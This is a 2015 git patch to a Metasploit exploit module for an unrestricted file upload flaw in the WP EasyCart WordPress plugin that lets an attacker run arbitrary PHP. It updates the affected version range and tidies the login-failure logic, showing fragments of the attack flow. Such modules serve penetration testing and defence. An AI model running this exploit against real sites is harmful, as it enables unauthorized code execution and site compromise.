From 9d3397901bd1dd0d651a72f8a20106169baae757 Mon Sep 17 00:00:00 2001
From: rastating <rob@rastating.com>
Date: Mon, 19 Jan 2015 20:59:46 +0000
Subject: [PATCH] Correct version numbers and code tidy up

---
 .../wp_easycart_unrestricted_file_upload.rb    | 18 ++++++++++--------
 1 file changed, 10 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
index 3a19dd6c9c..8dee9128fa 100644
--- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(
       info,
-      'Name'            => 'WordPress WP EasyCart 3.0.4 Unrestricted File Upload',
+      'Name'            => 'WordPress WP EasyCart Unrestricted File Upload',
       'Description'     => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
                               WordPress contains a flaw that allows a remote
                               attacker to execute arbitrary PHP code. This
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate'  => 'Jan 08 2015',
       'Platform'        => 'php',
       'Arch'            => ARCH_PHP,
-      'Targets'         => [['wp-easycart < 3.0.16', {}]],
+      'Targets'         => [['wp-easycart < 3.0.17', {}]],
       'DefaultTarget'   => 0
     ))
 
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    check_plugin_version_from_readme('wp-easycart', '3.0.16')
+    check_plugin_version_from_readme('wp-easycart', '3.0.17')
   end
 
   def generate_mime_message(payload, date_hash, name, include_req_id)
@@ -126,13 +126,15 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("#{peer} - Authenticating using #{username}:#{password}...")
       cookie = wordpress_login(username, password)
 
-      if use_ec_authentication
-        print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") if cookie.nil?
+      if !cookie
+        if use_ec_authentication
+          print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
+        else
+          fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
+        end
       else
-        fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+        print_good("#{peer} - Authenticated with WordPress")
       end
-
-      print_good("#{peer} - Authenticated with WordPress") unless cookie.nil?
     end
 
     print_status("#{peer} - Preparing payload...")